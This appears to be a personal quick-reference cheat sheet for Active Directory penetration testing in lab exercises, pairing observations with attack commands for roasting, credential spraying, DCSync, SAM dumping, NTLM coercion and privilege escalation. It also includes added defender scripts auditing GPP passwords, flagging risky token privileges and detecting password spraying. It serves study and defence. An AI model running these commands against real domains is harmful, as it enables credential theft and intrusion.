GTR - Got To Remember
Quick-reference mental model. Not a checklist - a set of instincts to build. Each entry answers: “what should this make me think?”
Version: 26.03.2026
When You See This…
Ports & Services
| You see… | Think… |
|---|---|
| 88 + 389 + 445 | Domain Controller. Run zbulim. Start with null/guest auth. |
| 5985 open | WinRM available. First credential you find, test it here. |
| 1433 (MSSQL) on a DC | Two attack surfaces. MSSQL can coerce NTLM hashes even without xp_cmdshell. |
| 1433 on a non-DC | Use -d . not --local-auth for MSSQL auth. Also check if SMB signing is off - relay is viable. |
| 80 on a DC | OSINT. Staff pages = username candidates. Feed to username-anarchy + AS-REP roast. |
| 80 + PHP + IIS | Unusual combo. Look for the app name - search "<appname> exploit" immediately. |
| SMB signing: not required | Responder is viable. Any coercion primitive (xp_dirtree, PrinterBug, PetitPotam) will give you a crackable hash or relayable auth. |
| No 88/389 (no DC ports) | Member server. Adjust tooling: use -d . or --local-auth. |
Shares & Files
| You see… | Think… |
|---|---|
| Non-standard share (HR, Dev, IT, Backup, Reports, Shares) | Spider it immediately with spider_plus -o DOWNLOAD_FLAG=True. |
| .xlsm / macro-enabled Office doc | olevba or open it and check VBA. Connection strings with credentials are common. |
| .zip with a password | zip2john + john. |
| .pfx file | pfx2john + john. Then openssl pkcs12 to extract cert + key. Use with evil-winrm -S -k -c. |
| .xml file in a user’s folder | Read it. Azure AD Connect stores plaintext passwords in XML. |
| azure.xml anywhere | Plaintext sync account credentials. High value. |
| Groups.xml on SYSVOL or cached | GPP password. Decrypt with gpp-decrypt. Works even post-MS14-025 if the file wasn’t cleaned up. |
| .reg file with "Password"=hex: | VNC encrypted password. Decrypt with vncpwd. |
| Backup archive (.zip, .7z) in a web root | Download via HTTP directly. Check for hidden files with tree -a. grep -ri password everything. |
| web.config, config.php, waptserver.ini | Connection strings. Always check these files on any web shell. |
| $RECYCLE.BIN folder | Check it. Deleted files including config archives sometimes live here. |
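
Added audit example (not from the original page and not the code of any tool it names): a Python scanner that walks a copy of SYSVOL and reports every Group Policy Preference item still carrying a cpassword, the leftover the Groups.xml row above describes. It parses the XML instead of grepping, covers the other preference files that use the same attribute (Services, ScheduledTasks, DataSources, Drives, Printers), and treats an empty attribute as "no password stored". The SAMPLE_GROUPS_XML value, its account names and its cpassword string are constructed for this example.

```python
"""Audit Group Policy Preference XML files for leftover cpassword attributes."""
import os
import xml.etree.ElementTree as ET

# Standard preference file names that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attribute each preference type uses for the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text, source="<inline>"):
    """Return one finding per element that carries a non-empty cpassword.

    A finding records the file, the preference item type (User, NTService,
    Task, Drive, ...), the account name if one is present, the item's
    'changed' timestamp and the length of the stored ciphertext. A parse
    error is reported as a finding too, so a malformed file does not
    silently drop out of the report.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [{"file": source, "item": "PARSE_ERROR", "account": None,
                 "changed": None, "cpassword_len": 0, "detail": str(exc)}]

    # <Properties> sits under the item element; map children back to parents.
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpass = elem.attrib.get("cpassword", "")
        if not cpass:
            continue  # attribute absent or empty: no stored password
        item = parent_of.get(elem, elem)
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
        findings.append({
            "file": source,
            "item": item.tag,
            "account": account,
            "changed": item.attrib.get("changed"),
            "cpassword_len": len(cpass),
        })
    return findings


def scan_sysvol(path):
    """Walk a SYSVOL copy and aggregate findings from every known GPP file."""
    findings = []
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:  # GPP files carry a BOM
                    findings.extend(find_cpasswords(fh.read(), source=full))
    return findings


# Constructed sample: one local-admin item still holding a cpassword and one
# item whose password was cleared (empty attribute). The ciphertext is a
# placeholder, not a real GPP value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" changed="2014-03-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="EXAMPLEcpasswordPLACEHOLDER0000000000000000"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Helpdesk" changed="2015-06-01 09:00:00">
    <Properties action="U" userName="Helpdesk" cpassword=""/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(finding)
```

Any non-empty hit is a finding regardless of patch state: MS14-025 only stopped new passwords being written, and an existing file stays decryptable until the preference is removed. Point scan_sysvol at a read-only copy of the domain's SYSVOL share.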
Credentials & Users
| You see… | Think… |
|---|---|
| A list of real names (website, email) | username-anarchy → AS-REP roast the whole candidate list. One hit confirms the naming convention. |
| A password but no username | Enumerate users (RID brute if needed), then spray. Don’t dismiss the password. |
| Credentials that fail auth | Enumerate the real user list. Typos in AutoLogon/scripts are common. Spray the password against all users. |
| Null Auth: True in nxc | Try --users, --rid-brute, --shares with both -u '' and -u 'guest'. |
| Guest auth on SMB but no null | Try --shares, spider_plus. Non-standard shares are the prize. |
| A new account gained | Re-enumerate: shares, BloodHound, certipy find -vulnerable, net user, whoami /priv. |
| User description in --users output | Read every description. Passwords stored as notes are common. |
| Custom LDAP attribute on a user | Base64 decode it. Custom attributes like cascadeLegacyPwd are legacy password stores. |
| AutoLogon credentials in winPEAS | The password is real even if the username is wrong. Enumerate users and spray it. |
| PS history file | cat $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. Credentials in one-liners are common. |
Group Memberships (run net user <you> after every shell)
| You are in… | You can do… |
|---|---|
| Account Operators | Add yourself to most groups (not DA directly, but Exchange, etc.). Check BloodHound for what those groups can reach. |
| Backup Operators | reg save hklm\sam + reg save hklm\system → secretsdump.py LOCAL → local admin NT hash. |
| Server Operators | Hijack any service binary path with sc.exe config <svc> binPath=... → restart → SYSTEM shell. |
| LAPS_Readers | nxc ldap -M laps → plaintext local admin password for every LAPS-managed machine. |
| AD Recycle Bin | Get-ADObject -includeDeletedObjects -property * → recover deleted user attributes including passwords. |
| Group Policy Creator Owners | Create + link a GPO to a target OU → SharpGPOAbuse to add a scheduled task → SYSTEM. |
| Exchange Windows Permissions | WriteDACL on the domain root → grant yourself DCSync → secretsdump.py. |
| DnsAdmins | Load a malicious DLL into the DNS service (runs as SYSTEM). |
Privileges (run whoami /priv after every shell)
| You have… | You can do… |
|---|---|
| SeBackupPrivilege | Read any file. Dump SAM + SYSTEM hives. Copy NTDS.dit via shadow copy. |
| SeRestorePrivilege | Write any file. Replace binaries. |
| SeImpersonatePrivilege | Potato attacks: GodPotato, PrintSpoofer → SYSTEM. Common on service accounts. |
| SeLoadDriverPrivilege | Load a kernel driver → SYSTEM (Capcom.sys technique). |
| SeDebugPrivilege | Dump LSASS memory → extract credentials. |
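
Added example (not from the original page): a Python parser for `whoami /priv` output that a defender can run over collected service-account token listings to flag the privileges in the table above. It goes slightly beyond the page's five entries by also flagging SeAssignPrimaryTokenPrivilege and SeTakeOwnershipPrivilege, and it treats a "Disabled" state as still held, because the owner of the token can enable a held privilege at will; only its absence from the list means the account does not have it. Columns are located from the `====` ruler line rather than by splitting on spaces, because the widest entry in each column is separated from the next column by a single space. The sample listing is constructed for this example.

```python
"""Parse `whoami /priv` output and flag high-risk token privileges."""
import re

# Privileges worth a finding and why. The first five are the page's own list;
# the two marked (added) are well-known members of the same abuse classes.
HIGH_RISK = {
    "SeBackupPrivilege": "read any file: SAM/SYSTEM hives, NTDS.dit via shadow copy",
    "SeRestorePrivilege": "write any file: replace service binaries",
    "SeImpersonatePrivilege": "token impersonation to SYSTEM (Potato family)",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeDebugPrivilege": "open LSASS and other protected processes",
    "SeAssignPrimaryTokenPrivilege": "same token-abuse class as SeImpersonate (added)",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object (added)",
}


def parse_whoami_priv(text):
    """Return [{'name', 'description', 'state'}] for each privilege row."""
    lines = text.splitlines()
    for idx, line in enumerate(lines):
        # The ruler line consists only of '=' groups separated by single spaces;
        # each group's span is the width of one column.
        if line.strip() and set(line.strip()) <= {"=", " "}:
            spans = [(m.start(), m.end()) for m in re.finditer(r"=+", line)]
            rows = lines[idx + 1:]
            break
    else:
        raise ValueError("no column ruler found in whoami /priv output")
    if len(spans) < 3:
        raise ValueError("expected Privilege Name / Description / State columns")

    privs = []
    for row in rows:
        if not row.strip():
            continue
        name = row[spans[0][0]:spans[0][1]].strip()
        desc = row[spans[1][0]:spans[1][1]].strip()
        state = row[spans[2][0]:].strip()  # last column: take the rest of the line
        privs.append({"name": name, "description": desc, "state": state})
    return privs


def triage(privs):
    """Return the high-risk privileges present, whatever their current state."""
    hits = []
    for p in privs:
        if p["name"] in HIGH_RISK:
            note = ("held but disabled: the token owner can enable it"
                    if p["state"] == "Disabled" else "enabled")
            hits.append({"name": p["name"], "state": p["state"],
                         "why": HIGH_RISK[p["name"]], "note": note})
    return hits


# Constructed sample listing, laid out exactly as whoami /priv prints it:
# columns padded to the widest entry, separated by one space.
_ROWS = [
    ("SeAssignPrimaryTokenPrivilege", "Replace a process level token", "Disabled"),
    ("SeIncreaseQuotaPrivilege", "Adjust memory quotas for a process", "Disabled"),
    ("SeChangeNotifyPrivilege", "Bypass traverse checking", "Enabled"),
    ("SeImpersonatePrivilege", "Impersonate a client after authentication", "Enabled"),
    ("SeCreateGlobalPrivilege", "Create global objects", "Enabled"),
    ("SeIncreaseWorkingSetPrivilege", "Increase a process working set", "Disabled"),
]
SAMPLE_WHOAMI_PRIV = "\n".join([
    "PRIVILEGES INFORMATION",
    "----------------------",
    "",
    f"{'Privilege Name':<29} {'Description':<41} State",
    "=" * 29 + " " + "=" * 41 + " " + "=" * 8,
    *(f"{n:<29} {d:<41} {s}" for n, d, s in _ROWS),
])

if __name__ == "__main__":
    for hit in triage(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{hit['name']:<32} {hit['state']:<9} {hit['why']} [{hit['note']}]")
```

The sample is the typical token of a service account such as an IIS application pool identity; the two hits it produces are exactly the case the table marks as "common on service accounts".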
ADCS (run certipy find -vulnerable with any domain credential)
| You find… | Attack |
|---|---|
| ESC1 | certipy req -upn administrator@domain -template <vuln_template> → cert → certipy auth → NT hash. |
| ESC7 | Add yourself as Officer via certipy ca -add-officer → request SubCA cert for admin → self-approve → certipy auth → NT hash. |
| ESC9 | Template has no security extension - UPN trusted at face value. Out of OSCP scope. |
| ManageCA on any account | ESC7 is likely. Check for Officer escalation path. |
Stuck? Try These in Order
Stuck with no creds at all
- Null session: `nxc smb <ip> -u '' -p ''` and `nxc smb <ip> -u guest -p ''`
- RID brute: `nxc smb <ip> -u guest -p '' --rid-brute`
- AS-REP roast with username list: `nxc ldap <ip> -u users.txt -p '' --asreproast`
- Username-as-password spray after getting a user list
Stuck with low-priv creds
- BloodHound first. Mark owned. Run “Shortest Paths from Owned Objects to Tier Zero.”
- `certipy find -vulnerable` - ADCS misconfigs are everywhere and often overlooked
- Re-enumerate shares with the new account - access changes per credential
- Check user descriptions: `nxc smb <ip> -u <user> -p <pass> --users`
- Check PS history, AutoLogon, SYSVOL scripts for credentials
Stuck on a shell with no obvious privesc
- `net user <you>` - group memberships
- `whoami /priv` - token privileges
- winPEAS or PowerUp `Invoke-AllChecks`
- Check SQL Server error logs: `C:\<SQLpath>\MSSQL\Log\ERRORLOG*`
- Check Recycle Bin: `gci -force 'C:\$RECYCLE.BIN'`
- Check web app config files: `config.php`, `web.config`, `appsettings.json`, `*.ini`
Stuck and nothing is working
- Reset the box - service may be down (seen with MSSQL on Escape)
- Re-read every file you downloaded. One detail was probably missed.
- BloodHound: mark every account you own and rerun paths.
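
Added example (not from the original page): the defender-side counterpart to the spray and username-guessing steps above. It runs over a constructed, simplified export of Security-log logon events, one per line as `timestamp,event_id,target_user,source_ip,status` (4625 failed logon, 4624 success; NTSTATUS 0xC000006A wrong password, 0xC0000064 no such user), and flags any source that fails against many distinct accounts inside a short window, the signature of one password sprayed across a user list rather than one user mistyping their own. It also reports failures for accounts that do not exist (the trace a guessed username list leaves) and whether the source logged on successfully right after the spray. The field layout and every address and account name are assumptions made for this example.

```python
"""Detect password spraying in a simplified export of Windows logon events."""
import csv
import io
from collections import Counter, defaultdict
from datetime import datetime, timedelta

STATUS_WRONG_PASSWORD = "0xC000006A"
STATUS_NO_SUCH_USER = "0xC0000064"


def parse_events(text):
    """Parse 'ts,event_id,user,src,status' lines into dicts sorted by time."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if not row or row[0].startswith("#"):
            continue
        ts, event_id, user, src, status = row
        events.append({"ts": datetime.fromisoformat(ts), "id": int(event_id),
                       "user": user.lower(), "src": src, "status": status})
    events.sort(key=lambda e: e["ts"])
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return one finding per source whose failures span >= min_users accounts
    within any sliding window of the given length."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        best = None
        in_window = Counter()  # distinct users currently inside the window
        left = 0
        for right, e in enumerate(failures):
            in_window[e["user"]] += 1
            # Shrink the window from the left until it fits the time bound.
            while failures[right]["ts"] - failures[left]["ts"] > window:
                old = failures[left]["user"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            distinct = len(in_window)
            if distinct >= min_users and (best is None or distinct > best["distinct_users"]):
                best = {"source": src, "distinct_users": distinct,
                        "window_start": failures[left]["ts"].isoformat(),
                        "window_end": e["ts"].isoformat()}
        if best is None:
            continue
        # Failures for accounts that do not exist: a guessed username list.
        best["unknown_users"] = sorted({e["user"] for e in failures
                                        if e["status"] == STATUS_NO_SUCH_USER})
        # A success from the same source after the spray means the sprayed
        # password matched someone; that finding is the one to page on.
        spray_end = datetime.fromisoformat(best["window_end"])
        success = next((e for e in evs if e["id"] == 4624 and e["ts"] >= spray_end), None)
        best["success_after_spray"] = success["user"] if success else None
        findings.append(best)
    return findings


# Constructed sample: one source sprays seven accounts (one of which does not
# exist) in 14 seconds and then logs on as an eighth; a second source is a
# user retyping their own password, which must not be flagged.
SAMPLE_LOG = """\
# ts,event_id,target_user,source_ip,status
2026-03-26T09:00:01,4625,alice,10.10.14.5,0xC000006A
2026-03-26T09:00:03,4625,bob,10.10.14.5,0xC000006A
2026-03-26T09:00:05,4625,carol,10.10.14.5,0xC000006A
2026-03-26T09:00:07,4625,dave,10.10.14.5,0xC000006A
2026-03-26T09:00:09,4625,svc-old,10.10.14.5,0xC0000064
2026-03-26T09:00:11,4625,erin,10.10.14.5,0xC000006A
2026-03-26T09:00:13,4625,frank,10.10.14.5,0xC000006A
2026-03-26T09:00:15,4624,grace,10.10.14.5,0x0
2026-03-26T09:02:00,4625,helen,192.168.1.20,0xC000006A
2026-03-26T09:02:30,4625,helen,192.168.1.20,0xC000006A
2026-03-26T09:03:00,4624,helen,192.168.1.20,0x0
"""

if __name__ == "__main__":
    for finding in detect_spray(parse_events(SAMPLE_LOG)):
        print(finding)
```

Keying on distinct target accounts per source, not on raw failure counts, is what separates a spray from lockout noise, and it is also why sprays tuned to stay under the lockout threshold still show up here.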
Quick Credential Validation Flow
Got a credential? Test in this order:
```bash
nxc smb <ip> -u <user> -p <pass>     # Does it auth? Is it local admin (Pwn3d!)?
nxc winrm <ip> -u <user> -p <pass>   # Shell access?
nxc ldap <ip> -u <user> -p <pass>    # Domain user? Useful for BloodHound/certipy
nxc mssql <ip> -u <user> -p <pass>   # DB access? (or -d . on non-DC)
```
Got an NT hash? Same flow but replace -p <pass> with -H <hash>.
Tool Shortcuts
```bash
# Full recon in one command
zbulim <ip>
# BloodHound collection from Kali
rusthound-ce -i <dc-ip> -d <domain> -u <user> -p <pass> -c All -z
# AS-REP roast (also validates usernames)
nxc ldap <dc-ip> -u users.txt -p '' --asreproast out.txt
# Kerberoast
nxc ldap <dc-ip> -u <user> -p <pass> --kerberoasting out.txt
# LAPS password
nxc ldap <dc-ip> -u <user> -p <pass> -M laps
# MSSQL coercion (Responder must be running)
nxc mssql <ip> -u <user> -p <pass> -M mssql_coerce -o LISTENER=<tun0-ip>
# Find ADCS vulns
certipy find -vulnerable -u <user>@<domain> -p <pass> -dc-ip <ip> -stdout
# DCSync
secretsdump.py <domain>/<user>:<pass>@<dc-ip>
# Decrypt GPP password
gpp-decrypt <cpassword>
# SAM dump from downloaded hives
secretsdump.py -sam sam -system system LOCAL
```

Things That Are Easy to Forget
- Sync the clock before any Kerberos operation: `sudo ntpdate -s <dc-ip>`
- `nxc smb` returns `(Pwn3d!)` for local admin. No `(Pwn3d!)` = authenticated but not admin.
- secretsdump `RemoteOperations failed` is normal - the DRSUAPI fallback still works.
- pfx2john output may have a `b'...'` wrapper under Python 3 - strip it before feeding it to john.
- `tree -a` shows hidden files (dotfiles). Always use it on downloaded archives.
- After every new credential: re-run shares, BloodHound, certipy.
- MSSQL on non-DC: `-d .` not `--local-auth`.
- SMB signing off = relay viable. SMB signing on = only capture (Responder), not relay.